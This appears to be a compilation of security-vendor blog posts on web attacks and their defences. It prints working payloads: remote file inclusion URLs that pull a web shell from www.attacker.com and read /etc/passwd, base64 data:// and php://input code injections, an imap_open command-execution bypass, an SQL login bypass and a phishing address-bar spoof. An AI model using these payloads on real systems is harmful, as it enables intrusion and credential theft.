    Apache Struts is a Java-based framework released in 2001. The regular discovery of code evaluation vulnerabilities in the framework has generated many discussions about its security. For example, the Equifax breach, which led to losses of $439 million and the theft of a huge amount of personal data, was the result of CVE-2017-5638, a critical code execution vulnerability in the Apache Struts framework.

    A Quick Recap of Apache Struts Remote Code Evaluation CVE-2018-11776

    Let's recap the vulnerability, which can be exploited on recent Apache Struts versions. CVE-2018-11776 (discovered in August 2018) is perfect for a Google Bot attack, since the payload is sent through the URL. Not surprisingly, this was the vulnerability that CroniX abused.

    Example

    Here are two examples:

    The configuration that leads to the vulnerability allows the namespace to be supplied through the URL path when no namespace is set for an action. In this situation it's possible to inject an OGNL (Object-Graph Navigation Language) expression. OGNL is an expression language for Java.

    Here is an example of a configuration that is vulnerable to CVE-2018-11776:

    <struts>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

    <package name="default" extends="struts-default">

    <action name="help">
      <result type="redirectAction">
          <param name="actionName">date.action</param>
      </result>
    </action>
    ..
    ..
    .
    </struts>

    You can use the following sample payload to confirm the existence of CVE-2018-11776. If you open the URL http://your-struts-instance/${4*4}/help.action and you get redirected to http://your-struts-instance/16/date.action, you can confirm that the vulnerability exists.

    As mentioned before, this is the perfect context for a Google Bot attack. As CroniX shows, attackers can go as far as spreading Cryptomining malware using a combination of Apache Struts CVE-2018-11776 and Google Bots.

    Solutions to the Google Bots Attack

    At this point, the possibility of malicious links being directed at your website through Google Bots should make you question which third parties you can really trust. Yet blocking Google Bot requests entirely would negatively influence your position in the search engine's results: if Google Bots cannot browse your website, your ranking will drop. And if your application detects malicious requests and blocks the sending IP, attackers can deliberately deliver malicious payloads through Google Bot requests to get those bots blocked, damaging your search rankings even further.

    Control the External Connections on Your Website

    Attackers can use their websites, or those under their control, to conduct malicious activity using Google Bots. They might also place links on a website in comments under blog posts.

    If you want an overview of the external links on your website, you can check the Out-of-Scope Links node in the Netsparker Knowledge Base following a scan.

    Out of Scope Links

    The Correct Handling of Links Added by Users

    Even though it won't prevent attackers from abusing Google Bots to attack websites, you might still be able to prevent a negative search engine ranking if you take certain precautions. For example, you can prevent search bots from following links by setting the rel attribute to nofollow. This is how it's done:

    <a rel="nofollow" href="http://www.functravel.com/">Cheap Flights</a>

    Due to the 'nofollow' value of the rel attribute, the bots will not visit the link.

    Similarly, the meta tags you define between the <head></head> tags will help control the behavior of the search bots on all URLs found on the page.

    <meta name="googlebot" content="nofollow" />
    <meta name="robots" content="nofollow" />

    You can give these commands using the X-Robots-Tag response header, too:

    X-Robots-Tag: googlebot: nofollow

    You should note that the commands given with X-Robots-Tag and meta tags apply to all internal and external links.
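    If you render user-submitted HTML (for example, comments under blog posts), you can also enforce nofollow on the server side before the content is displayed. Here is a rough PHP sketch using DOMDocument – the helper function name is made up for illustration:

    <?php
    // Force rel="nofollow" on every link in a snippet of user-submitted HTML.
    function add_nofollow_to_links($html)
    {
        $doc = new DOMDocument();
        // Suppress warnings about imperfect user markup and avoid adding <html>/<body> wrappers.
        @$doc->loadHTML($html, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);

        foreach ($doc->getElementsByTagName('a') as $link) {
            $link->setAttribute('rel', 'nofollow');
        }

        return $doc->saveHTML();
    }

    echo add_nofollow_to_links('<p>Check out <a href="http://www.functravel.com/">Cheap Flights</a></p>');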

    Further Reading

    Read more about the research on the Google Bots attack in Abusing Googlebot Services to Deliver Crypto-Mining Malware.

    Authors, Netsparker Security Researchers:

    Ziyahan Albeniz
    Umran Yildirimkaya
    Sven Morgenroth

    The Powerful Resource of PHP Stream Wrappers


    Introduced in PHP 4.3, streams are a little-known but powerful resource that PHP provides.

    PHP Stream Wrappers

    In this article, we will explore ways to bypass protection methods using PHP stream wrappers, which are responsible for handling protocol-related tasks like downloading data from a web or FTP server and exposing it in a way that can be handled with PHP's stream-related functions. First, let's define the key terms 'stream' and 'wrapper'.

    What is a Stream in IT?

    In technical terms, a 'stream' is the name given to the transmission of data from a source to a target. The source and the target can take various forms: a file, a TCP/IP or UDP network connection, standard input and output, a file transfer on a file server, or a file archiving process. Even though these streams seem very different from each other, they have a common thread: they are all basically read and write processes. You either write data from a source to a target, or you transmit the data you read from the source to the target. It might look something like this:

    1. Connection established
    2. Data read
    3. Data written
    4. Connection ended

    Even though the basic actions are to read and write, there are additional actions that need to happen in order to reach a web server or archive a file, or to do a simple input and output process, or establish a connection through TCP/IP or UDP.

    Generic Functions in Streaming Operations

    PHP has some generic functions that enable you to interact with streams:

    • file
    • fopen
    • fwrite
    • fclose
    • file_get_contents
    • file_put_contents

    In PHP, you use these generic functions to perform various streaming operations without the hassle of using protocol-specific functions, making the entire process easier.

    Traditionally, these functions were mostly used for reading and writing files. With wrappers, we can now use them for various other streaming operations, such as HTTP, FTP and socket connections, as well as standard input/output.

    If you want to work with streams, you need to specify their type and target in a specific format. The stream type we’ll use in our generic functions is defined like this:

    <wrapper>://<target>

    The <wrapper> placeholder specifies the stream type we'll use, for example file://, ftp://, php://output, php://input, http:// or ssl://.

    If you are a PHP programmer, the following code will be familiar. It reads the some.txt file and prints its content.

    <?php
    $handle = fopen("some.txt","rb");
    while(feof($handle)!==true) {
       echo fgets($handle);
    }

    In the code, we’re calling the fopen generic stream function using the file:// system wrapper. Technically, the code above does the exact same thing as the code below:

    <?php
    $handle = fopen("file://some.txt","rb");
    while(feof($handle)!==true) {
       echo fgets($handle);
    }

    Since the default wrapper in streaming functions is file://, you don’t have to specify it if you want to use it.

    If you want to know which wrappers you are allowed to use, you can use the code below to list them.

    <?php
       print_r(stream_get_wrappers());

    The Concept of Stream-Context

    The default usage of stream functions may be enough for most use cases. However, there are circumstances where you need more than the default.

    <?php
    file_get_contents("http://www.example.com/news.php");

    Let’s assume that the news on http://www.example.com/news.php can be easily read using the file_get_contents command. But what if this website requires some form of authentication to access its contents? In such cases, you can use the stream-context specification that helps customize the stream behavior using optional parameters.

    Here’s a stream-context code sample:

    <?php
    $postdata = '{"username":"ziyahan"}';
       $opts = array('http' =>
           array(
               'method' => 'POST',
               'header' => "Content-Type: application/json; charset=utf-8\r\n".
                   'Content-Length: '.mb_strlen($postdata),
               'content' => $postdata
           )
       );

       $context = stream_context_create($opts);
       $response = file_get_contents('http://www.example.com/news.php', false,
       $context);

    As seen above, a stream context is created from an array of options. The top-level key indicates the wrapper type (in this case http) that the options apply to. Each wrapper has individual context parameters. You can read more about them in the PHP documentation.

    PHP Stream Filters

    We've examined the read and write processes of streams. One big advantage of streams is that the data can be modified, transformed, or discarded on the fly during the read/write process.

    PHP provides a few built-in stream filters: string.toupper, string.tolower, string.rot13, and string.strip_tags. Various custom filters can be used in addition to these.

    We can apply filters to streams using the stream_filter_append function. For example, the filter below will convert everything that is read to uppercase:

    <?php
       $handle = fopen('file://data.txt','rb');
       stream_filter_append($handle, 'string.toupper');
       while(feof($handle)!==true) {
           echo fgets($handle);
       }
       fclose($handle);

    The information read in data.txt will be displayed on the screen as uppercase.

    You can also use the php://filter wrapper to add filters to streams:

    <?php
       $handle = fopen('php://filter/read=string.toupper/resource=data.txt','rb');

       while(feof($handle)!==true) {
           echo fgets($handle);
       }
       fclose($handle);

    With this method, the filter is applied the moment the stream is opened. Compared to the first example, this approach is much more practical for functions that do not let you attach filters afterwards, such as file() and fpassthru().

    You may use the filters for encoding (rot13, base64) or file zipping and extracting.

    Besides PHP and predefined wrappers, you may use third-party wrappers like Amazon S3 or Dropbox, and write customized wrappers for specific operations.
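    Registering your own wrapper only takes a class that implements the streamWrapper prototype and a call to stream_wrapper_register(). Here's a minimal sketch – the hello:// scheme and the class name are made up for illustration:

    <?php
    // A toy read-only wrapper: any hello:// URL streams a fixed string.
    class HelloWrapper
    {
        public $context;                 // populated by PHP automatically
        private $data = "Hello from a custom stream wrapper\n";
        private $position = 0;

        public function stream_open($path, $mode, $options, &$opened_path)
        {
            $this->position = 0;
            return true;
        }

        public function stream_read($count)
        {
            $chunk = substr($this->data, $this->position, $count);
            $this->position += strlen($chunk);
            return $chunk;
        }

        public function stream_eof()
        {
            return $this->position >= strlen($this->data);
        }

        public function stream_stat()
        {
            return [];
        }
    }

    stream_wrapper_register('hello', 'HelloWrapper');
    echo file_get_contents('hello://greeting'); // works with any generic stream function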

    The techniques shown so far fall under the Local File Inclusion (LFI) category, where files from the target system are included in the code in order to extract the system's data.

    Using PHP Wrappers in a Remote File Inclusion Attack

    Besides LFI, it is also possible to inject code into the web application remotely. This is called Remote File Inclusion (RFI). By executing commands on the server, you can gain control over it and greatly increase the impact of the attack.

    Here’s a sample code snippet:

    <?php
       include($_GET["go"].".php");

    Using this simple but powerful code, you can browse websites with links such as www.example.com/?go=contact and www.example.com/?go=products.

    However, this code has a fundamental flaw. Let's assume that there's a file called malscript.txt on some remote server and that the file holds the following code:

    <?php
       phpinfo();

    This is the URL of the file holding the code you see above: http://www.attacker.com/malscript.txt

    The attacker would then call the following URL in order to load this malicious script.

    www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt
    <?php
       include("http://www.attacker.com/malscript.txt.php");

    The .php extension appended by the developer shows up in this example as a barrier. In RFI attacks, bypassing it is rather easy.

    This is the URL the attacker would supply: http://www.attacker.com/malscript.txt?q=. And here is the full URL that the attacker needs to visit in order to execute the attack:

    www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt%3Fq%3D
    <?php
       include("http://www.attacker.com/malscript.txt?q=.php");

    The .php barrier was bypassed using the “?q=” characters in the attack URL. That was just an example. In many cases, you can just host the file with the appropriate extension. However, this trick is also quite useful for Server Side Request Forgery attacks.

    After this process, sensitive server information will be visible due to the phpinfo() function in the .txt file. The .txt file was injected into the PHP function from the remote server, and the code in the text file was executed as part of the website’s code.

    That was a rather harmless example though, given the fact that we can execute any PHP code that way. The code in malscript.txt can be modified to do some more damage, instead of just reading some server information, like so:

    <?php
       system("uname -a");

    As you can see, we can execute system commands with an RFI, which is as bad as it gets. This code would allow the attacker to execute any command they want by supplying it as a GET parameter:

    <?php
       system($_GET["cmd"]);

    Yet again we have the same script URL as in our previous examples: http://www.attacker.com/malscript.txt?q=. But this time we can supply a system command as an additional GET parameter named cmd:

    www.example.com/?cmd=uname+-a&go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt?q=

    At this point, all sorts of commands can be run by the server per the attacker’s request.

    If the .php extension barrier cannot be bypassed using the query string, you can make the appended extension work for you instead. Create a PHP file with the code below and upload it to your server.

    This is the content of the backdoor.php file:

    <?php
       echo '<?php system($_GET["cmd"]);?>';

    Therefore the new link the attacker needs to supply is: http://www.attacker.com/backdoor. And this is the link the attacker needs to visit in order to execute the attack:

    http://example.com/?cmd=cat%20/etc/passwd&go=http%3A%2F%2Fwww.attacker.com%2Fbackdoor

    PHP will evaluate this code as follows:

    <?php
       include("http://www.attacker.com/backdoor.php");

    Bypassing Blacklists with Stream Wrappers

    What if the developer started taking precautions and filtered out some inputs?

    For example, suppose you can no longer use http:// within the parameter. The path to exploiting the vulnerability seems to be blocked. This is where stream wrappers come into play: instead of the filtered http:// wrapper, you can use other options such as the php://input wrapper.

    The php://input wrapper takes the input from the POST request body and passes it to the PHP interpreter. How can it be used to exploit an RFI vulnerability?

    Here is a sample request:

    POST http://www.example.com?go=php://input%00 HTTP/1.1
    Host: example.com
    Content-Length: 30

    <?php system($_GET["cmd"]); ?>

    As seen above, even though the http:// and file:// wrappers were filtered out, the php://input wrapper was used to exploit the vulnerability.

    Even if the developer blacklists the php:// wrapper and keywords that allow system-level command execution (such as system and cmd), there are still ways around these barriers. The data:// wrapper can be used in this case. Its job is to pass the input given to it, as a media type and a value, to the PHP stream functions.

    The code above was:

    <?php
       system($_GET["cmd"]);

    If the data:// wrapper can be used, the attacker can simply use the following code without the need to host an external file:

    data://text/plain, <?php system($_GET["cmd"]);

    This is what the URL-encoded version of the final request looks like:

    data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e
    http://www.example.com/?go=data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e

    The command to be executed is sent in the cmd parameter. For example, to get system information you can use uname -a, but you have to URL-encode it first.

    The URL used to attack:

    http://www.example.com/?cmd=uname+-a&go=data%3a%2f%2ftext%2fplain%2c+<%3fphp+system(%24_GET%5b"cmd"%5d)%3b+%3f>

    But we forgot that the developer also blacklisted keywords like system and cmd. What can you do instead?

    Thankfully the data:// wrapper supports base64 and rot13 encoding. Therefore, you have to encode the PHP code you’ll use to exploit the vulnerability in base64 and make the following request:

    PHP code:

    <?php
       system($_GET["cmd"]);

    This is the base64 encoded version of the exploit. PHP will decode it and execute its contents.

    PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

    The URL you’ll make a request with:

    http://www.example.com/?cmd=uname+-a&go=data://text/plain;base64,PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

    Seems innocent, doesn't it? Yet the script code in the go parameter, encoded in base64, is ready to execute commands at the operating system level using the cmd parameter.

    Conclusion

    In this article, we took a look at how wrappers allow the same generic functions to be used for different stream operations. These wrappers can also be used to bypass some security filters. As the examples above show, it's almost impossible to ensure security using blacklists, since the attack surface continuously grows. It's far more effective to whitelist the accepted functions and inputs than to blacklist keywords like http://, file://, php://, system, and cmd and update the list each time a new attack vector is discovered. Efficiency is key in securing your web applications.

    You can also disable the remote file inclusion functionality (the allow_url_include setting in PHP) and, as always, you should never allow user-controlled input in functions that lead to file inclusion and eventually code execution, such as require, include, require_once, include_once and others.

    Web Browser Address Bar Spoofing


    The Google security team state that the address bar is the most important security indicator in modern browsers. This part of the browser supplies both the true identity of the website and verification that you are on the right website.

    Web Browser Address Bar Spoofing

    Eric Lawrence, the author of Fiddler, an HTTP debugging proxy, has written about this feature on his personal blog. In his article, he gave reasons why web developers couldn’t interfere with anything above the webpage window, sometimes referred to as The Line of Death, and what problems might occur from this lack of involvement. Despite his efforts to raise awareness, two address bar spoofing incidents took place the same year the blog post was published.

    Homograph Vulnerability

    One of the address bar spoofing incidents was the Homograph vulnerability that took place in April 2017. Using the International Domain Name (IDN) feature, which allows domain names to be written in foreign characters, attackers imitate legitimate domains using characters from various alphabets to trick users. This attack is called a Homograph attack.

    For example, due to IDN, the xn--80ak6aa92e.com address would be shown as "аррӏе.com", which is virtually indistinguishable from the real "apple.com", even though these are totally different letters that just happen to look the same. Don't believe us?

    • Copy this а here
    • Paste it into your browser bar, and press Return
    • Did you receive search results for the letter 'a' of the Latin alphabet or the Cyrillic script?

    However, browser developers took precautions by releasing security patches that prevented this confusing behaviour shortly after the discovery of the vulnerability. One tactic was to convert an IDN address into the ASCII format in the address bar, which managed to prevent malicious activity.
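    You can see for yourself what that ASCII (Punycode) form looks like. With PHP's intl extension, for example, a short sketch like the following should convert the аррӏе.com example above back into its xn-- form:

    <?php
    // Requires the intl extension. Converts a Unicode domain to its Punycode/ASCII form.
    $unicodeDomain = 'аррӏе.com';   // Cyrillic look-alike of apple.com
    echo idn_to_ascii($unicodeDomain, IDNA_DEFAULT, INTL_IDNA_VARIANT_UTS46);
    // Expected output: something like xn--80ak6aa92e.com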

    Address Bar Spoofing in Microsoft Edge and Safari

    The second address bar spoofing incident was discovered by Pakistani researcher Rafay Baloch, who lectures at various conferences, such as Blackhat, on his research about browser security. The address spoofing technique he found affected Microsoft Edge and Safari browsers.

    • When a website redirected its visitors to another website on a closed port, the attacker could intervene and change the content of the current web page however they liked.
    • Since the URL bar already showed the address of the domain with the closed port, users were led to believe that they were browsing a legitimate site instead of an attacker-controlled one, and could be convinced to enter their credentials.
    • In his proof of concept, before redirecting the user to the website with the closed port, Baloch decoded a base64-encoded copy of the Gmail login page and added it to the DOM. As a result, the address in the URL bar (http://gmail.com:8080) and the phishing page looked very convincing. Baloch kept the spoofed address stable by using the setInterval() function, which tried to redirect the user every 100 seconds.

    The Code Used to Spoof the Web Browser Address Bar

    Baloch used the following code for the aforementioned exploit.

    function spoof()
    {
    var gmail = 'PCFET0NC8+KArOK.........ZHk+PC9odG1sPg=='; // The base64 encoded version of the Gmail page

    x=document.body.innerHTML=atob(gmail);

    document.write("<title>Gmail</title>");
    document.write("x");
    window.location.assign("https://www.Gmail.com:8080");
    }
    setInterval(spoof(),100000);
    </script>

    The proof of concept above is the one that worked on Microsoft Edge. The latest security update for Microsoft Edge fixed the vulnerability, and Baloch announced in a tweet that Apple also fixed it with the release of Safari 12. You can read more about his research in the blog post Apple Safari & Microsoft Edge Browser Address Bar Spoofing - Writeup.

    Conclusion

    The address bar is the main component users rely on to navigate the internet: they enter the website they wish to visit, and security-conscious users may watch how the address changes as the page loads. Attackers are aware of this, and therefore invent smart ways to deceive the user, such as the Homograph attacks and the vulnerabilities found by Rafay Baloch. Keeping all software, especially web browsers, up to date is crucial to help prevent similar attacks.

    Exposing the Public IPs of Tor Services Through SSL Certificates


    The Onion Router, also known as Tor, is an internet service that provides anonymous internet surfing to users by bouncing the connection over several relays. By doing this, Tor users avoid exposing their IP addresses to the servers they visit; instead, these servers see only the IP address of one of Tor's exit nodes. But Tor doesn't only protect its users when they visit websites like Google.com or Facebook.com.

    Another option on the Tor network, for users who wish to preserve their anonymity, is Tor hidden services. These can only be reached over Tor, and you can recognize them by their .onion extension. Contrary to popular belief, these websites aren't only used for shady activity, but also for legitimate purposes. In fact, many websites that you use on a daily basis can also be accessed as a similar hidden service, in order to serve users who value anonymity. For example, you can access The New York Times through https://www.nytimes3xbfgragh.onion or Facebook through https://facebookcorewwwi.onion, as long as you are currently using Tor.

    Another advantage, this time for website owners, is that users cannot find out the real IP of your server. This is a big win for privacy and makes it hard to censor or take down a hidden service. In order to run such a service, besides adjusting a series of settings for Tor, you also need to set up a web server like Apache or Nginx on the machine you'll host your website on.

    The vulnerability we discuss here, which allows anyone to find out the real IP of a hidden service, arises from a misconfiguration in the Tor setup.

    Common Mistake in SSL Setup on Tor

    OK, so if you're using Tor, you're clearly concerned about maintaining anonymity on the internet. Let's assume that you implement TLS/SSL to secure the Tor service. To do so, you have to get the certificate for your website with the .onion extension signed by a certificate authority. Let's assume that your service URL is examplewwwi.onion. When someone requests the website, the server sends the encryption data and the certificate in the ServerHello response to the ClientHello request. The Common Name (CN) field in the certificate will state your domain, examplewwwi.onion.

    Let's say you're using a web server such as Apache, Nginx or something similar, and you misconfigure it to listen for connections on all network interfaces (0.0.0.0) instead of only the loopback address (127.0.0.1). This will have a catastrophic impact on your web server's anonymity. Let's look at why in the following section.

    Exposure of the Public IP of the Tor Service You’re Using

    Anyone who connects to port 443 on your server's public, non-Tor IP address will see the certificate, including the .onion domain in the CN, in the ServerHello response to their ClientHello message.

    You might wonder how people can find out your public IP when you’re using Tor.

    Attackers could follow this method to find it out:

    1. They send a connection request to an IP range (e.g. 75.30.203.1 - 75.30.203.254) through port 443.
    2. They send a ClientHello message.
    3. They extract the CN in the ServerHello message.
    4. They match the IPs with the .onion domains.

    By doing so repeatedly, they are able to map the public IP addresses of many hidden services on the Tor network.
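    Steps 1 to 3 are trivial to automate for a single address. A rough PHP sketch (the IP below is just a placeholder) that grabs the CN from whatever certificate is presented on port 443 could look like this:

    <?php
    // Connect to port 443 of an IP, capture the presented certificate and print its CN.
    $context = stream_context_create([
        'ssl' => [
            'capture_peer_cert' => true,
            'verify_peer'       => false,  // we only want the certificate, not a trusted session
            'verify_peer_name'  => false,
        ],
    ]);

    $client = @stream_socket_client('ssl://203.0.113.10:443', $errno, $errstr, 5,
        STREAM_CLIENT_CONNECT, $context);

    if ($client !== false) {
        $params = stream_context_get_params($client);
        $cert   = openssl_x509_parse($params['options']['ssl']['peer_certificate']);
        echo $cert['subject']['CN'] ?? 'no CN', "\n";  // e.g. examplewwwi.onion on a misconfigured server
    }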

    Conclusion

    Staying safe requires attention and keeping an eye on new attack methods. As recent research by Rosselyn Barroyeta shows, a misconfiguration can leave you exposed even when using the most secure service. She conducted a live demonstration of the impact such a misconfiguration can have and how it results in IP address exposure.

    For further information, see IP’s públicas de Tor son expuestas mediante certificados SSL (Spanish).

    Fragmented SQL Injection Attacks – The Solution


    Ask someone how they'd detect whether a SQL Injection vulnerability exists in a web application and they're likely to suggest putting a single quote into a parameter in the application. Then, if they received an error, they could infer the presence of an SQL Injection vulnerability. Don't be surprised if you come across someone defining SQL Injection as Single Quote Injection.

    Fragmented SQL Injection Attacks – The Solution

    In this blog post, we discuss the research on Fragmented SQL Injection where the hackers control two entry points in the same context in order to bypass the authentication form. Let’s take a quick look at the importance of single quotes in SQL injection attacks.

    Single Quotes in SQL Injections

    In a system (command interpreter, file system or database management system, for example), characters that have special meanings are called metacharacters. For instance, in the SQL query context, single and double quotes are used as string delimiters. They are used both at the beginning and the end of a string. This is why when a single or double quote is injected into a query, the query breaks and throws an error. Here’s an example of where the quotes are placed in the query.

    SELECT * FROM users WHERE user_name='USER_INPUT'

    So, when a single quote is injected into the entry point above, the query interpreter will either complain about invalid syntax or report that it can't find the quote's pair at the end of the string.

    Code:
    $username = "'";
    $query = "SELECT * FROM users WHERE username='".$username."'";

    Result:
    SELECT * FROM users WHERE username='''

    The system will throw an error for the single quote left unpaired at the end of the query. This is only valid for the string context. There is no need to inject single or double quotes into the context below, since the id parameter doesn’t expect a string.

    $query = "SELECT * FROM users WHERE id= " . $user_input;

    In the example above, you don't have to inject a quote at all to perform an SQL injection: you can input a numeric value, and anything that follows it will be evaluated as part of the SQL command.

    The error returned due to the injection of a single quote may signify that the input from the user was not filtered or sanitized in any way, and that the input contains characters that have special meaning on the database.

    Let’s take a look at an instance where the single quote is blacklisted or escaped from the command.

    $username ="' or 1=1 --";
    $password ="qwerty123456";
    // . . .
    $query = "SELECT * FROM users WHERE username='".$username."' AND password='".$password."'";

    select * from users where username='\' or 1=1 -- ' and password='qwerty123456';

    As you see in this example, because the single quote (') is escaped with a backslash, the payload does not work as intended by the hacker.

    Fragmented SQL Injection

    Fragmented SQL Injection (not a term used by its inventor Rodolfo) takes place when two input points are used jointly to bypass the authentication form.

    If hackers can control multiple points, and the values from these points are in the same context, they can use fragmented payloads to circumvent blacklists and character limits with this method.

    We saw in the examples above that a single quote was injected and then escaped with a backslash (\). In a Fragmented SQL injection, if you use the backslash in the first field, and another SQL command that will return 'true' in the second field, you’ll be able to bypass the form. Here’s a demonstration of what happens in the background:

    username: \
    password: or 1 #

    $query = "select * from users where username='".$username."' and password='".$password."'";

    select * from users where username='\' or password=' or 1 # ';

    The backslash neutralizes the single quote that follows it, so the value of the username column ends at the single quote that comes right after password=. This effectively removes the password check from the query. Due to the or 1 condition, the WHERE clause will always return true, and the # (hash) comments out the rest of the query, so you are able to bypass the login check and the login form.

    The Inconvenient Solution to SQL Injection Attacks

    Please note that the blog post we referenced in this article suggests using the htmlentities() function in PHP to filter inputs, as a way to prevent the attack we described above. If you set the ENT_QUOTES flag, HTML encoding will convert single quotes, double quotes, and tag opening and closing signs, to their corresponding HTML entities. For example, a double quote would be encoded as '&quot;'.

    However, this is not the ideal solution, because there are situations where single or double quotes are not required to carry out an SQL injection attack. In addition, some old-school techniques like GBK encoding can be used to bypass protections like the addslashes() function in PHP, which weakens the overall prevention mechanism.

    Prepared Statements are the Ideal Way to Prevent SQL Injection Attacks

    At Netsparker, we believe that the correct and proper solution to prevent SQL Injection attacks is to use Prepared Statements, otherwise known as Parameterized Queries.

Parameterized Queries allow you to separate the structure of the SQL query from its values. The remaining methods of preventing SQL injection attacks can sooner or later be bypassed with neat tricks such as Chris Shiflett’s character-encoding trick, and are therefore not reliable.

    Implementation of Parameterized Query in PHP and .NET

    In PHP, you can use the Parameterized Query technique as illustrated:

// $dbh is an existing PDO connection; the placeholders keep the query structure separate from the data
$stmt = $dbh->prepare("UPDATE users SET email=:new_email WHERE id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();

    For .NET applications, you can use it as illustrated:

    string sql = "SELECT * FROM Customers WHERE CustomerId = @CustomerId";
    SqlCommand command = new SqlCommand(sql);
    command.Parameters.Add(new SqlParameter("@CustomerId", System.Data.SqlDbType.Int));
    command.Parameters["@CustomerId"].Value = 1;

    Conclusion

Developers still use blacklists to prevent SQL Injection vulnerabilities. They do this either manually or using functions designed for this purpose (e.g. addslashes). However, we encounter new tactics in information security every day that attempt to bypass these blacklists. Ultimately, the best way to prevent injection-based flaws like SQL Injection is to use a Prepared Statement. This is the only effective way developers can teach the system not to evaluate user-controlled parameters as part of the query structure.

    Bypass of Disabled System Functions


    Imagine that you discover an Unrestricted File Upload vulnerability and upload a web shell to the server. Or, you have a payload that allows you to execute commands on the system through Local File Inclusion (LFI) or Remote File Inclusion (RFI) vulnerabilities.


    When you execute the command that’s expected to call system functions on the server side, you’re greeted by a surprise warning which states that you’re not allowed to execute the function because it’s disabled.

    www.example.com/shell.php?cmd=whoami

    Warning: system() has been disabled for security reasons in /var/www/html/shell.php on line 6

The disable_functions directive in the php.ini configuration file allows you to disable certain PHP functions. One of the suggested hardening practices is to disable functions such as system, exec, shell_exec and passthru using the disable_functions directive, to prevent an attacker from executing system commands. However, a user named Twoster on the Russian Antichat forum announced a new method for bypassing this security mechanism. In this blog post, we discuss the technical details of the bypass.
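For context, the directive takes a comma-separated list of function names in php.ini (for example, disable_functions = system,exec,shell_exec,passthru), and you can check which functions are currently disabled from within PHP itself; a trivial illustration:

<?php
// Prints the comma-separated list of functions disabled via the disable_functions directive.
echo ini_get('disable_functions');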

    The Exploit Code of the Bypass

Last week, Anton Lopanitsyn shared the exploit code on GitHub following the announcement on the Antichat forum. The exploit code makes it clear that the bypass relies on the imap_open() function, which becomes available once the imap extension is installed in PHP.

<?php
# CRLF (c)
# The base64 payload decodes to: echo '1234567890'>/tmp/test0001
# Tabs (\t) stand in for spaces, which are not accepted in the server part of the mailbox string.

$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

The imap_open() function isn’t part of the PHP core. It’s a wrapper around the IMAP client library developed by researchers at the University of Washington. As stated above, PHP will only have the imap_open() function defined after you’ve installed the IMAP PHP extension. Let’s analyze each component of the exploit code.

    The Parameters of imap_open Function

    We’re going to take a closer look at the mailbox parameter the function takes, to understand how the imap_open function works in the exploit. Here is the syntax of the function:

    resource imap_open ( string $mailbox , string $username , string $password [, int $options = 0 [, int $n_retries = 0 [, array $params = NULL ]]] )

    The value for the mailbox parameter consists of the server name and the mailbox file path on the server. The name INBOX stands for the current user’s personal mailbox. This is how you set the mailbox parameter:

    $mbox = imap_open ("{localhost:993/PROTOCOL/FLAG}INBOX", "user_id", "password");

Between the curly brackets, you can see the server name or IP address, the port number (after the colon) and the protocol name. After the protocol name, you can optionally append one or more flags.

    The warning in the official documentation of PHP about setting up the imap_open parameters is crucial.


This warning states that unless imap.enable_insecure_rsh is disabled, user data should not be passed directly to the mailbox parameter. Let's take a look at how the IMAP extension works to understand what the imap.enable_insecure_rsh configuration option does, and why the warning prompts users to disable it.

    The IMAP Server Types and SSH Connection

    There are two Unix-based IMAP servers that are widely used. One is imapd, developed by the University of Washington, and the other is the IMAP server developed by Cyrus.

Cyrus stores user emails in a built-in database, so accessing Cyrus is only possible through the IMAP protocol. This is why, when Cyrus is in use, IMAP accounts are not tied to the user accounts on the Unix system where the IMAP server is installed.

On the other hand, imapd stores the emails in files owned by the mail users on the Unix system, such as /var/spool/mail. User accounts and access privileges on imapd are tied directly to the Unix server. If your mail is stored in a spool file you are authorized to access, you can log in through SSH and exercise those same privileges on the files.

When SSH access is available, there’s no need to go through the entire IMAP login procedure. The imap_open function first establishes an SSH connection and, if the user is authorized, skips IMAP authentication altogether. This is called the IMAP preauthenticated mode. The warning about the mailbox parameter is based on this behaviour: the mailbox value is passed as a parameter to the SSH command while the connection is being set up.

Before the secure SSH protocol was widely used, there was a protocol called rsh. However, it’s quite insecure by default, doesn’t use encryption and shouldn’t be used for connections outside (or even inside) the local network. Setting the imap.enable_insecure_rsh configuration option to 0 deactivates both rsh and ssh for preauthentication.

    The -oProxyCommand in the Exploit

    One of the many parameters the SSH command uses is the -o parameter, which allows you to set the options available for use during the connection. ProxyCommand is one of the options that can be set right before commencing the SSH connection. For example:

    ssh -oProxyCommand="touch tmp.txt" localhost

    When you execute this command, you’ll realize that the tmp.txt file will be created even if an SSH connection is not made to localhost.


When all the components of the exploit code come together, a system that has functions such as system and passthru disabled can still be made to execute commands through RFI or LFI vulnerabilities.

    Additional Measures Against the Bypass

    There are two ways to protect yourself against the dangers of the imap PHP extension. The first is by checking for any special characters (such as forward slashes) whenever you pass user input to imap_open, which would prevent a Remote Code Execution vulnerability. We stated above that you can use certain flags within the mailbox parameter. The /norsh flag is one of these and you should set it in order to disable the IMAP preauthenticated mode.
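Here is a minimal sketch of both measures, assuming a hypothetical $host value taken from user input and placeholder credentials:

<?php
// Illustrative hardening sketch only.
$host = $_GET['host'] ?? 'localhost';
$user = 'user';
$password = 'secret';

// Reject characters that have no place in a hostname (backslashes, slashes, braces, whitespace).
if (preg_match('#[\\\\/{}\s]#', $host)) {
    die('Invalid mailbox host');
}

// The /norsh flag disables the rsh/ssh preauthenticated mode for this connection.
$mbox = imap_open('{' . $host . ':993/imap/ssl/norsh}INBOX', $user, $password)
    or die('Error: ' . imap_last_error());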

In addition, an effective defence against the disable_functions bypass is to disable the imap.enable_insecure_rsh option by setting it to '0' in the php.ini file. However, this option isn’t available in PHP version 5, so you should think twice about whether you really need the imap extension, and whether you should add imap_open to your list of disabled functions.

    Authors, Netsparker Security Researchers:

    Ziyahan Albeniz
